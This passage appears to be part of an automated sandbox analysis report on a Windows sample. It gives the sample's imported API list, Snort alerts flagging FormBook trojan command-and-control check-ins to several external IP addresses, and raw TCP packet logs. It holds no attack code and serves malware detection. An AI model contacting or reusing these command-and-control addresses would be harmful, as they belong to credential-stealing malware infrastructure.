                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/04/24-03:12:38.577180TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976180192.168.2.4116.213.43.190
                  07/04/24-03:12:35.806170TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.4116.213.43.190
                  07/04/24-03:13:29.265779TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977180192.168.2.4162.241.253.174
                  07/04/24-03:13:47.726029TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977580192.168.2.435.190.52.58
                  07/04/24-03:11:49.918725TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974980192.168.2.4116.213.43.190
                  07/04/24-03:11:30.935623TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.4207.148.37.252
                  07/04/24-03:13:25.838396TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976980192.168.2.438.47.232.224
                  07/04/24-03:11:42.301664TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.4116.213.43.190
                  07/04/24-03:10:37.155346TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.4116.213.43.190
                  07/04/24-03:12:43.659425TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976380192.168.2.4116.213.43.190
                  07/04/24-03:13:12.602462TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976580192.168.2.413.248.169.48
                  07/04/24-03:12:24.376986TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975380192.168.2.4203.161.55.102
                  07/04/24-03:10:44.897966TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974080192.168.2.4116.213.43.190
                  07/04/24-03:13:52.790653TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977980192.168.2.435.190.52.58
                  07/04/24-03:13:53.626059TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978080192.168.2.4202.95.21.152
                  07/04/24-03:11:28.369643TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.4207.148.37.252
                  07/04/24-03:13:45.175297TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977380192.168.2.435.190.52.58
                  07/04/24-03:13:10.075816TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976480192.168.2.413.248.169.48
                  07/04/24-03:12:16.585944TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.4203.161.55.102
                  07/04/24-03:13:30.898164TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977280192.168.2.438.47.232.224
                  07/04/24-03:13:46.020455TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977480192.168.2.4202.95.21.152
                  07/04/24-03:13:17.664187TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976780192.168.2.413.248.169.48
                  07/04/24-03:12:19.121759TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.4203.161.55.102
                  07/04/24-03:10:20.795048TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973680192.168.2.4165.154.0.120
                  07/04/24-03:11:44.836772TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.4116.213.43.190
                  07/04/24-03:13:23.294796TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976880192.168.2.438.47.232.224
                  07/04/24-03:11:36.007994TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974580192.168.2.4207.148.37.252
                  07/04/24-03:10:39.695122TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.4116.213.43.190
                  07/04/24-03:13:48.555866TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977680192.168.2.4202.95.21.152

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 4, 2024 03:10:20.788136959 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:20.792928934 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:20.793035030 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:20.795047998 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:20.799813032 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.714555979 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.714987040 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.714996099 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.715085983 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:21.716105938 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.716114998 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.716156960 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:21.717240095 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:21.717283964 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:21.719261885 CEST4973680192.168.2.4165.154.0.120
                  Jul 4, 2024 03:10:21.723942041 CEST8049736165.154.0.120192.168.2.4
                  Jul 4, 2024 03:10:37.148261070 CEST4973780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:37.153318882 CEST8049737116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:37.153419018 CEST4973780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:37.155345917 CEST4973780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:37.161106110 CEST8049737116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:38.671027899 CEST4973780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:38.716851950 CEST8049737116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:39.688195944 CEST4973880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:39.693016052 CEST8049738116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:39.693165064 CEST4973880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:39.695122004 CEST4973880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:39.699912071 CEST8049738116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:41.200614929 CEST4973880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:41.249944925 CEST8049738116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.334420919 CEST4973980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:42.339262962 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.339345932 CEST4973980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:42.347687006 CEST4973980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:42.352523088 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352533102 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352585077 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352654934 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352706909 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352776051 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352788925 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352893114 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:42.352900982 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:43.872517109 CEST4973980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:43.920900106 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:44.891166925 CEST4974080192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:44.895970106 CEST8049740116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:44.896059036 CEST4974080192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:44.897965908 CEST4974080192.168.2.4116.213.43.190
                  Jul 4, 2024 03:10:44.902672052 CEST8049740116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:58.516448021 CEST8049737116.213.43.190192.168.2.4
                  Jul 4, 2024 03:10:58.516515017 CEST4973780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:01.096749067 CEST8049738116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:01.096843958 CEST4973880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:03.735394955 CEST8049739116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:03.735474110 CEST4973980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:06.269541979 CEST8049740116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:06.269681931 CEST4974080192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:06.274136066 CEST4974080192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:06.279232979 CEST8049740116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:28.360053062 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:28.365034103 CEST8049742207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:28.365169048 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:28.369642973 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:28.374424934 CEST8049742207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:29.378324986 CEST8049742207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:29.378434896 CEST8049742207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:29.378451109 CEST8049742207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:29.378496885 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:29.378498077 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:29.872566938 CEST4974280192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:30.914050102 CEST4974380192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:30.919161081 CEST8049743207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:30.919719934 CEST4974380192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:30.935622931 CEST4974380192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:30.940538883 CEST8049743207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:31.832192898 CEST8049743207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:31.832299948 CEST8049743207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:31.832355022 CEST4974380192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:32.451627970 CEST4974380192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:33.470155001 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:33.475042105 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.475106955 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:33.477741003 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:33.482621908 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482646942 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482707024 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482721090 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482758999 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482784033 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482839108 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482882023 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:33.482889891 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:34.369812965 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:34.419641018 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:34.588848114 CEST8049744207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:34.591697931 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:34.981965065 CEST4974480192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.000670910 CEST4974580192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.005954027 CEST8049745207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:36.006053925 CEST4974580192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.007993937 CEST4974580192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.016695976 CEST8049745207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:36.905635118 CEST8049745207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:36.905808926 CEST8049745207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:36.905966043 CEST4974580192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.908422947 CEST4974580192.168.2.4207.148.37.252
                  Jul 4, 2024 03:11:36.913387060 CEST8049745207.148.37.252192.168.2.4
                  Jul 4, 2024 03:11:42.289742947 CEST4974680192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:42.294648886 CEST8049746116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:42.298021078 CEST4974680192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:42.301664114 CEST4974680192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:42.306480885 CEST8049746116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:43.810226917 CEST4974680192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:43.857217073 CEST8049746116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:44.830077887 CEST4974780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:44.835000992 CEST8049747116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:44.835124969 CEST4974780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:44.836771965 CEST4974780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:44.841670036 CEST8049747116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:46.341947079 CEST4974780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:46.389156103 CEST8049747116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.368952990 CEST4974880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:47.373884916 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.373961926 CEST4974880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:47.385162115 CEST4974880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:47.389947891 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390003920 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390017033 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390032053 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390053034 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390238047 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390274048 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390297890 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:47.390311003 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:48.888184071 CEST4974880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:48.948968887 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:49.906128883 CEST4974980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:49.917154074 CEST8049749116.213.43.190192.168.2.4
                  Jul 4, 2024 03:11:49.917221069 CEST4974980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:49.918725014 CEST4974980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:11:49.923508883 CEST8049749116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:03.882019043 CEST8049746116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:03.882075071 CEST4974680192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:06.223591089 CEST8049747116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:06.229895115 CEST4974780192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:08.765728951 CEST8049748116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:08.765892029 CEST4974880192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:11.316958904 CEST8049749116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:11.317053080 CEST4974980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:11.317925930 CEST4974980192.168.2.4116.213.43.190
                  Jul 4, 2024 03:12:11.322770119 CEST8049749116.213.43.190192.168.2.4
                  Jul 4, 2024 03:12:16.575726032 CEST4975080192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:16.580523014 CEST8049750203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:16.583760977 CEST4975080192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:16.585943937 CEST4975080192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:16.590702057 CEST8049750203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:17.219511986 CEST8049750203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:17.219583988 CEST8049750203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:17.219649076 CEST4975080192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:18.091483116 CEST4975080192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:19.109992981 CEST4975180192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:19.115631104 CEST8049751203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:19.118032932 CEST4975180192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:19.121758938 CEST4975180192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:19.126529932 CEST8049751203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:19.733378887 CEST8049751203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:19.733572960 CEST8049751203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:19.733623028 CEST4975180192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:20.660761118 CEST4975180192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:21.672835112 CEST4975280192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:21.677794933 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.677869081 CEST4975280192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:21.680033922 CEST4975280192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:21.684850931 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.684926987 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.684936047 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.684994936 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.685003996 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.685156107 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.685163975 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.685225010 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:21.685233116 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:22.283852100 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:22.283989906 CEST8049752203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:22.289927006 CEST4975280192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:23.185133934 CEST4975280192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:24.232115984 CEST4975380192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:24.370708942 CEST8049753203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:24.373788118 CEST4975380192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:24.376986027 CEST4975380192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:24.390603065 CEST8049753203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:24.993602991 CEST8049753203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:24.993715048 CEST8049753203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:24.993988991 CEST4975380192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:24.996011019 CEST4975380192.168.2.4203.161.55.102
                  Jul 4, 2024 03:12:25.000787020 CEST8049753203.161.55.102192.168.2.4
                  Jul 4, 2024 03:12:29.431607008 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:29.436652899 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:29.436760902 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:29.437565088 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:29.442323923 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.084703922 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.084764004 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.084984064 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.084990025 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.085036039 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.086328030 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.086333036 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.086380005 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.087090015 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.087101936 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.087140083 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.088169098 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.088176012 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.088218927 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.089225054 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.089298010 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.091783047 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.091844082 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.092860937 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.092909098 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.175725937 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.175796986 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.176007032 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.176012993 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.176059008 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.176980019 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.177028894 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.180579901 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.180651903 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.180883884 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.180891037 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.180934906 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.181996107 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.182044029 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.185393095 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.185492039 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.185672045 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.185678959 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.185723066 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.186789989 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.186796904 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.186856031 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.190248966 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.190342903 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.190521955 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.190529108 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.190572977 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.191637993 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.191693068 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.195117950 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.195257902 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.195521116 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.195528984 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.195570946 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.196512938 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.196518898 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.196563959 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.265685081 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.265753984 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.265770912 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.265887976 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.266402960 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.269798040 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.270512104 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.270515919 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.270634890 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.271089077 CEST8049754185.234.72.101192.168.2.4
